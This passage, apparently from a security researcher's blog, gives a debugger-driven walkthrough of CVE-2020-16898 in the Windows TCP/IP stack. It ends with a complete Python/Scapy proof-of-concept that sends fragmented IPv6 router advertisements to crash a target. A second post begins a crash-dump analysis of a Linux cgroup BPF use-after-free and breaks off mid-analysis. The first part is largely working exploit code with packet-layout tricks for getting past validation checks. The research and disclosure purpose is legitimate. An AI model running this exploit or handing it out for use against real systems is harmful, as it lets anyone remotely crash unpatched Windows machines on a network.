04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0
0: kd> g
...

Hm… OK. We never hit Ipv6pUpdateRDNSS but we did hit Ipv6pHandleRouterAdvertisement. This means that our package is fine. Why the hell we did not end up in Ipv6pUpdateRDNSS?

Problem 1 – IPv6 link-local address

We are failing validation of the address here:

fffff804`483ba4b4 458a02          mov     r8b,byte ptr [r10]
fffff804`483ba4b7 8d5101          lea     edx,[rcx+1]
fffff804`483ba4ba 8d5902          lea     ebx,[rcx+2]
fffff804`483ba4bd 41b7c0          mov     r15b,0C0h
fffff804`483ba4c0 4180f8ff        cmp     r8b,0FFh
fffff804`483ba4c4 0f84a8820b00    je      tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772)
fffff804`483ba4ca 33c0            xor     eax,eax
fffff804`483ba4cc 498bca          mov     rcx,r10
fffff804`483ba4cf 48898570010000  mov     qword ptr [rbp+170h],rax
fffff804`483ba4d6 48898578010000  mov     qword ptr [rbp+178h],rax
fffff804`483ba4dd 4484d2          test    dl,r10b
fffff804`483ba4e0 0f8599820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f)
fffff804`483ba4e6 4180f8fe        cmp     r8b,0FEh
fffff804`483ba4ea 0f85ab820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0]

r10 points to the beginning of the address:

0: kd> dq @r10
ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d
ffffcb82`f9a5b04a  000052b0`80db12fd b7220a02`ea3b3a4d
ffffcb82`f9a5b05a  08070800`e56c0086 00000000`00000000
ffffcb82`f9a5b06a  ffffffff`00000719 aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b07a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b08a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b09a  aaaaaaaa`aaaaaaaa 63733a6e`12990c28
ffffcb82`f9a5b0aa  70752d73`616d6568 643a6772`6f2d706e

These bytes:

ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d

are matching my IPv6 address which I’ve used as a source address:

v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5"

It is compared with byte 0xFE. By looking here We can learn that:

fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4).

OK, so it is looking for the link-local prefix. Another interesting check is when we fail the previous one:

fffff804`4847279b e8f497f8ff      call    tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94)
fffff804`484727a0 84c0            test    al,al
fffff804`484727a2 0f85567df4ff    jne     tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe)
fffff804`484727a8 4180f8fe        cmp     r8b,0FEh
fffff804`484727ac 7515            jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3)

It is checking if we are coming from the LOOPBACK, and next we are validated again for being the link-local. I’ve modified the packet to use link-local address and…

Breakpoint 1 hit
tcpip!Ipv6pUpdateRDNSS:
fffff804`4852a534 4055            push    rbp
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS
01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927
02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0

Works! OK, let’s move to the triggering bug phase.

Triggering the bug

What we know from the detection logic write-up:

“we check to see if the Length (second byte in the Option) is an even number”

Let’s test it:

v6_dst = 
v6_src = 

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

and we end up executing this code:

fffff804`4852a5b3 4c8b15be8b0700  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`4852a5ba e8113bceff      call    fffff804`4820e0d0
fffff804`4852a5bf 418bd7          mov     edx,r15d
fffff804`4852a5c2 498bce          mov     rcx,r14
fffff804`4852a5c5 488bd8          mov     rbx,rax
fffff804`4852a5c8 e8a39de5ff      call    tcpip!NetioAdvanceNetBuffer (fffff804`48384370)
fffff804`4852a5cd 0fb64301        movzx   eax,byte ptr [rbx+1]
fffff804`4852a5d1 8d4e01          lea     ecx,[rsi+1]
fffff804`4852a5d4 2bc6            sub     eax,esi
fffff804`4852a5d6 4183cfff        or      r15d,0FFFFFFFFh
fffff804`4852a5da 99              cdq
fffff804`4852a5db f7f9            idiv    eax,ecx
fffff804`4852a5dd 8b5304          mov     edx,dword ptr [rbx+4]
fffff804`4852a5e0 8945b7          mov     dword ptr [rbp-49h],eax
fffff804`4852a5e3 8bf0            mov     esi,eax
fffff804`4852a5e5 413bd7          cmp     edx,r15d
fffff804`4852a5e8 7412            je      tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc)

Essentially, it subtracts 1 from the Length field and the result is divided by 2. This follows the documentation logic and can be summarized as:

tmp = (Length - 1) / 2

This logic generates the same result for the odd and even number:

(8 – 1) / 2 => 3
(7 – 1) / 2 => 3

There is nothing wrong with that by itself. However, this also “defines” how long is the package. Since IPv6 addresses are 16 bytes long, by providing even number, the last 8 bytes of the payload will be used as a beginning of the next header. We can see that in the Wireshark as well:

That’s pretty interesting. However, what to do with that? What next header should we fake? Why this matters at all? Well… it took me some time to figure this out. To be honest, I wrote a simple fuzzer to find it out

Hunting for the correct header(s) (Problem 2)

If we look in the documentation at the available headers / options, we don’t really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml):

What we do know is that ICMPv6 messages have the following general format:

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |     Type      |     Code      |          Checksum             |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      +                         Message Body                          +
      |                                                               |

First byte is encoding “type” of the package. I’ve made the test and I’ve generated next header to be exactly the same as the “buggy” RDNSS one. I’ve been hitting breakpoint for tcpip!Ipv6pUpdateRDNSS but tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I’ve run my IDA Pro and started to analyze what’s going on and what logic is being executed. After some reverse engineering I realized that we have 2 loops in the code:

First loop goes through all the headers and does some basic validation (size of length etc)
Second loop doesn’t do any more validation but parses the package.

As soon as there are more ‘optional headers’ in the buffer, we are in the loop. That’s a very good primitive! Anyway, I still don’t know what headers should be used and to find it out I had been brute-forcing all the ‘optional header’ types in the triggered bug and found out that second loop cares only about:

Type 3 (Prefix Information)
Type 24 (Route Information)
Type 25 (RDNSS)
Type 31 (DNS Search List Option)

I’ve analyzed Type 24 logic since it was much “smaller / shorter” than Type 3.

Stack overflow

OK. Let’s try to generate the malicious RDNSS packet “faking” Route Information as a next one:

v6_dst = 
v6_src = 

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

This never hits tcpip!Ipv6pUpdateRDNSS function.

Problem 3 – size of the package.

After debugging I’ve realized that we are failing in the following check:

fffff804`483ba766 418b4618        mov     eax,dword ptr [r14+18h]
fffff804`483ba76a 413bc7          cmp     eax,r15d
fffff804`483ba76d 0f85d0810b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943)

where eax is the size of the package and r15 keeps an information of how much data were consumed. In that specific case we have:

rax = 0x48
r15 = 0x40

This is exactly 8 bytes difference because we use an even number. To bypass it, I’ve placed another header just after the last one. However, I was still hitting the same problem It took me some time to figure out how to play with the packet layout to bypass it. I’ve finally managed to do so.

Problem 4 – size again!

Finally, I’ve found the correct packet layout and I could end up in the code responsible for handling Route Information header. However, I did not Here is why. After returning from the RDNSS I ended up here:

fffff804`48472cba e875780b00      call    tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534)
fffff804`48472cbf 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472cc5 e9c980f4ff      jmp     tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93)
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
fffff804`483bad21 0fb64801        movzx   ecx,byte ptr [rax+1]
fffff804`483bad25 66c1e103        shl     cx,3
fffff804`483bad29 66894c2462      mov     word ptr [rsp+62h],cx
fffff804`483bad2e 6685c9          test    cx,cx
fffff804`483bad31 0f8485060000    je      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)
fffff804`483bad37 0fb7c9          movzx   ecx,cx
fffff804`483bad3a 413b4e18        cmp     ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8
fffff804`483bad3e 0f8778060000    ja      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)

ecx keeps the information about the “Length” of the “fake header”. However, [r14+18h] points to the size of the data left in the package. I set Length to the max (0xFF) which is multiplied by 8 (2040 == 0x7f8). However, there is only “0xb8” bytes left. So, I’ve failed another size validation!

To be able to fix it, I’ve decreased the size of the “fake header” and at the same time attached more data to the package. That worked!

Problem 5 – NdisGetDataBuffer() and fragmentation

I’ve finally found all the puzzles to be able to trigger the bug. I thought so… I ended up executing the following code responsible for handling Route Information message:

fffff804`48472cd9 33c0            xor     eax,eax
fffff804`48472cdb 44897c2420      mov     dword ptr [rsp+20h],r15d
fffff804`48472ce0 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472ce6 4c8d85b8010000  lea     r8,[rbp+1B8h]
fffff804`48472ced 418bd7          mov     edx,r15d
fffff804`48472cf0 488985b8010000  mov     qword ptr [rbp+1B8h],rax
fffff804`48472cf7 448bcf          mov     r9d,edi
fffff804`48472cfa 488985c0010000  mov     qword ptr [rbp+1C0h],rax
fffff804`48472d01 498bce          mov     rcx,r14
fffff804`48472d04 488985c8010000  mov     qword ptr [rbp+1C8h],rax
fffff804`48472d0b 48898580010000  mov     qword ptr [rbp+180h],rax
fffff804`48472d12 48898588010000  mov     qword ptr [rbp+188h],rax
fffff804`48472d19 4c8b1558041300  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0

It tries to get the “Length” bytes from the packet to read the entire header. However, Length is fake and not validated. In my test case it has value “0x100”. Destination address is pointing to the stack which represents Route Information header. It is a very small buffer. So, we should have classic stack overflow, but inside of the NdisGetDataBuffer function I ended-up executing this:

fffff804`4820e10c 8b7910          mov     edi,dword ptr [rcx+10h]
fffff804`4820e10f 8b4328          mov     eax,dword ptr [rbx+28h]
fffff804`4820e112 8bf2            mov     esi,edx
fffff804`4820e114 488d0c3e        lea     rcx,[rsi+rdi]
fffff804`4820e118 483bc8          cmp     rcx,rax
fffff804`4820e11b 773e            ja      fffff804`4820e15b
fffff804`4820e11d f6430a05        test    byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c
fffff804`4820e121 0f84813f0400    je      fffff804`482520a8
fffff804`4820e127 488b4318        mov     rax,qword ptr [rbx+18h]
fffff804`4820e12b 4885c0          test    rax,rax
fffff804`4820e12e 742b            je      fffff804`4820e15b
fffff804`4820e130 8b4c2470        mov     ecx,dword ptr [rsp+70h]
fffff804`4820e134 8d55ff          lea     edx,[rbp-1]
fffff804`4820e137 4803c7          add     rax,rdi
fffff804`4820e13a 4823d0          and     rdx,rax
fffff804`4820e13d 483bd1          cmp     rdx,rcx
fffff804`4820e140 7519            jne     fffff804`4820e15b
fffff804`4820e142 488b5c2450      mov     rbx,qword ptr [rsp+50h]
fffff804`4820e147 488b6c2458      mov     rbp,qword ptr [rsp+58h]
fffff804`4820e14c 488b742460      mov     rsi,qword ptr [rsp+60h]
fffff804`4820e151 4883c430        add     rsp,30h
fffff804`4820e155 415f            pop     r15
fffff804`4820e157 415e            pop     r14
fffff804`4820e159 5f              pop     rdi
fffff804`4820e15a c3              ret
fffff804`4820e15b 4d85f6          test    r14,r14

In the first ‘cmp‘ instruction, rcx register keeps the value of the requested size. Rax register keeps some huge number, and because of that I could never jump out from that logic. As a result of that call, I had been getting a different address than local stack address and none of the overflow happens. I didn’t know what was going on… So, I started to read the documentation of this function and here is the magic:

“If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows:
If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter.
If the Storage parameter is NULL, the return value is NULL.”

Here we go… Our big package is kept somewhere in NDIS and pointer to that data is returned instead of copying it to the local buffer on the stack. I started to Google if anyone was already hitting that problem and… of course yes Looking at this link:

http://newsoft-tech.blogspot.com/2010/02/

we can learn that the simplest solution is to fragment the package. This is exactly what I’ve done and….

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`45bca210 cc              int     3
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus
01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12
02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947
03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107
04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69
05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0
06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323
07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5
08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef
09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
...

Here we go!

Proof-of-Concept

Code can be found here:

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

Thanks,
Adam

CVE: 2020-14356 & 2020-25220

pi3 — Fri, 11 Sep 2020 05:35:44 +0000

The short story of 1 Linux Kernel Use-After-Free bug and 2 CVEs (CVE-2020-14356 and CVE-2020-25220)

Name:     Linux kernel Cgroup BPF Use-After-Free
Author:   Adam Zabrocki (pi3@pi3.com.pl)
Date:       May 27, 2020

First things first – short history:

In 2019 Tejun Heo discovered a racing problem with lifetime of the cgroup_bpf which could result in double-free and other memory corruptions. This bug was fixed in kernel 5.3. More information about the problem and the patch can be found here:

https://lore.kernel.org/patchwork/patch/1094080/

Roman Gushchin discovered another problem with the newly fixed code which could lead to use-after-free vulnerability. His report and fix can be found here:

https://lore.kernel.org/bpf/20191227215034.3169624-1-guro@fb.com/

During the discussion on the fix, Alexei Starovoitov pointed out that walking through the cgroup hierarchy without holding cgroup_mutex might be dangerous:

https://lore.kernel.org/bpf/20200104003523.rfte5rw6hbnncjes@ast-mbp/

However, Roman and Alexei concluded that it shouldn’t be a problem:

https://lore.kernel.org/bpf/20200106220746.fm3hp3zynaiaqgly@ast-mbp/

Unfortunately, there is another Use-After-Free bug related to the Cgroup BPF release logic.

The “new” bug – details (a lot of details ;-)):

During LKRG development and tests, one of my VMs was generating a kernel crash during shutdown procedure. This specific machine had the newest kernel at that time (5.7.x) and I compiled it with all debug information as well as SLAB DEBUG feature. When I analyzed the crash, it had nothing to do with LKRG. Later I confirmed that kernels without LKRG are always hitting that issue:

      KERNEL: linux-5.7/vmlinux
    DUMPFILE: /var/crash/202006161848/dump.202006161848  [PARTIAL DUMP]
        CPUS: 1
        DATE: Tue Jun 16 18:47:40 2020
      UPTIME: 14:09:24
LOAD AVERAGE: 0.21, 0.37, 0.50
       TASKS: 234
    NODENAME: oi3
     RELEASE: 5.7.0-g4
     VERSION: #28 SMP PREEMPT Fri Jun 12 18:09:14 UTC 2020
     MACHINE: x86_64  (3694 Mhz)
      MEMORY: 8 GB
       PANIC: "Oops: 0000 [#1] PREEMPT SMP PTI" (check log for details)
         PID: 1060499
     COMMAND: "sshd"
        TASK: ffff9d8c36b33040  [THREAD_INFO: ffff9d8c36b33040]
         CPU: 0
       STATE:  (PANIC)

crash> bt
PID: 1060499  TASK: ffff9d8c36b33040  CPU: 0   COMMAND: "sshd"
 #0 [ffffb0fc41b1f990] machine_kexec at ffffffff9404d22f
 #1 [ffffb0fc41b1f9d8] __crash_kexec at ffffffff941c19b8
 #2 [ffffb0fc41b1faa0] crash_kexec at ffffffff941c2b60
 #3 [ffffb0fc41b1fab0] oops_end at ffffffff94019d3e
 #4 [ffffb0fc41b1fad0] page_fault at ffffffff95c0104f
    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9423e801  RSP: ffffb0fc41b1fb88  RFLAGS: 00010246
    RAX: 0000000000000000  RBX: ffff9d8d56ae1ee0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9d8e25c40b00  RDI: ffffffff9423e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001
    ORIG_RAX: ffffffffffffffff  CS: 0010  SS: 0018
 #5 [ffffb0fc41b1fbd0] ip_finish_output at ffffffff957d71b3
 #6 [ffffb0fc41b1fbf8] __ip_queue_xmit at ffffffff957d84e1
 #7 [ffffb0fc41b1fc50] __tcp_transmit_skb at ffffffff957f4b27
 #8 [ffffb0fc41b1fd58] tcp_write_xmit at ffffffff957f6579
 #9 [ffffb0fc41b1fdb8] __tcp_push_pending_frames at ffffffff957f737d
#10 [ffffb0fc41b1fdd0] tcp_close at ffffffff957e6ec1
#11 [ffffb0fc41b1fdf8] inet_release at ffffffff9581809f
#12 [ffffb0fc41b1fe10] __sock_release at ffffffff95616848
#13 [ffffb0fc41b1fe30] sock_close at ffffffff956168bc
#14 [ffffb0fc41b1fe38] __fput at ffffffff942fd3cd
#15 [ffffb0fc41b1fe78] task_work_run at ffffffff94148a4a
#16 [ffffb0fc41b1fe98] do_exit at ffffffff9412b144
#17 [ffffb0fc41b1ff08] do_group_exit at ffffffff9412b8ae
#18 [ffffb0fc41b1ff30] __x64_sys_exit_group at ffffffff9412b92f
#19 [ffffb0fc41b1ff38] do_syscall_64 at ffffffff940028d7
#20 [ffffb0fc41b1ff50] entry_SYSCALL_64_after_hwframe at ffffffff95c0007c
    RIP: 00007fe54ea30136  RSP: 00007fff33413468  RFLAGS: 00000202
    RAX: ffffffffffffffda  RBX: 00007fff334134e0  RCX: 00007fe54ea30136
    RDX: 00000000000000ff  RSI: 000000000000003c  RDI: 00000000000000ff
    RBP: 00000000000000ff   R8: 00000000000000e7   R9: fffffffffffffdf0
    R10: 000055a091a22d09  R11: 0000000000000202  R12: 000055a091d67f20
    R13: 00007fe54ea5afa0  R14: 000055a091d7ef70  R15: 000055a091d70a20
    ORIG_RAX: 00000000000000e7  CS: 0033  SS: 002b

1060499 is a sshd’s child:

...
root        5462  0.0  0.0  12168  7276 ?        Ss   04:38   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
...
root     1060499  0.0  0.1  13936  9056 ?        Ss   17:51   0:00  \_ sshd: pi3 [priv]
pi3      1062463  0.0  0.0  13936  5852 ?        S    17:51   0:00      \_ sshd: pi3@pts/3
...

Crash happens in function “__cgroup_bpf_run_filter_skb”, exactly in this piece of code:

0xffffffff9423e7ee <__cgroup_bpf_run_filter_skb+382>: callq  0xffffffff94153cb0 
0xffffffff9423e7f3 <__cgroup_bpf_run_filter_skb+387>: callq  0xffffffff941925a0 <__rcu_read_lock>
0xffffffff9423e7f8 <__cgroup_bpf_run_filter_skb+392>: mov 0x3e8(%rbp),%rax
0xffffffff9423e7ff <__cgroup_bpf_run_filter_skb+399>: xor %ebp,%ebp
0xffffffff9423e801 <__cgroup_bpf_run_filter_skb+401>: mov 0x10(%rax),%rdi
                                                          ^^^^^^^^^^^^^^^
0xffffffff9423e805 <__cgroup_bpf_run_filter_skb+405>: lea 0x10(%rax),%r14
0xffffffff9423e809 <__cgroup_bpf_run_filter_skb+409>: test %rdi,%rdi

where RAX: 0000000000000000. However, when I was playing with repro under SLAB_DEBUG, I often got RAX: 6b6b6b6b6b6b6b6b:

    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9123e801  RSP: ffffb136c16ffb88  RFLAGS: 00010246
    RAX: 6b6b6b6b6b6b6b6b  RBX: ffff9ce3e5a0e0e0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9ce3de26b280  RDI: ffffffff9123e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001

So we have kind of a Use-After-Free bug. This bug is triggerable from user-mode. I’ve looked under IDA for the binary:

.text:FFFFFFFF8123E7EE skb = rbx      ; sk_buff * ; PIC mode
.text:FFFFFFFF8123E7EE type = r15     ; bpf_attach_type
.text:FFFFFFFF8123E7EE save_sk = rsi  ; sock *
.text:FFFFFFFF8123E7EE        call    near ptr preempt_count_add-0EAB43h
.text:FFFFFFFF8123E7F3        call    near ptr __rcu_read_lock-0AC258h ; PIC mode
.text:FFFFFFFF8123E7F8        mov     ret, [rbp+3E8h]
.text:FFFFFFFF8123E7FF        xor     ebp, ebp
.text:FFFFFFFF8123E801 _cn = rbp      ; u32
.text:FFFFFFFF8123E801        mov     rdi, [ret+10h]  ; prog
.text:FFFFFFFF8123E805        lea     r14, [ret+10h]

and this code is referencing cgroups from the socket. Source code:

int __cgroup_bpf_run_filter_skb(struct sock *sk,
				struct sk_buff *skb,
				enum bpf_attach_type type)
{
    ...
	struct cgroup *cgrp;
    ...

    ...
	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);
    ...
	if (type == BPF_CGROUP_INET_EGRESS) {
		ret = BPF_PROG_CGROUP_INET_EGRESS_RUN_ARRAY(
			cgrp->bpf.effective[type], skb, __bpf_prog_run_save_cb);
    ...
    ...
}

Debugger:

crash> x/4i 0xffffffff9423e7f8
   0xffffffff9423e7f8:  mov    0x3e8(%rbp),%rax
   0xffffffff9423e7ff:  xor    %ebp,%ebp
   0xffffffff9423e801:  mov    0x10(%rax),%rdi
   0xffffffff9423e805:  lea    0x10(%rax),%r14
crash> p/x (int)&((struct cgroup*)0)->bpf
$2 = 0x3e0
crash> ptype struct cgroup_bpf
type = struct cgroup_bpf {
    struct bpf_prog_array *effective[28];
    struct list_head progs[28];
    u32 flags[28];
    struct bpf_prog_array *inactive;
    struct percpu_ref refcnt;
    struct work_struct release_work;
}
crash> print/a sizeof(struct bpf_prog_array)
$3 = 0x10
crash> print/a ((struct sk_buff *)0xffff9ce3e5a0e0e0)->sk
$4 = 0xffff9ce3de26b280
crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

We also know that R15: 0000000000000001 == type == BPF_CGROUP_INET_EGRESS

crash> p/a ((struct cgroup *)0xffff9ce3e2416800)->bpf.effective[1]
